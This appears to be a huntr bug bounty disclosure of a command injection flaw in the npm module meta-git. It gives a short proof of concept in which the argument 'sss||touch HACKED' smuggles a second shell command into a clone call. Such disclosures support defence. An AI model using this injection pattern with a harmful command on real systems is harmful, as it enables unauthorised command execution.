For every bounty won throughout May 2021, huntr will donate half towards Indian COVID relief.
meta-git module is vulnerable against
command injection since the
user-supplied inputs are concatenated with a command which is executed without validation.
mkdir tests cd tests touch test touch secret touch files
npm i meta-git -g # Install affected module meta-git clone 'sss||touch HACKED' # *HACKED* file is created
HACKEDhas been created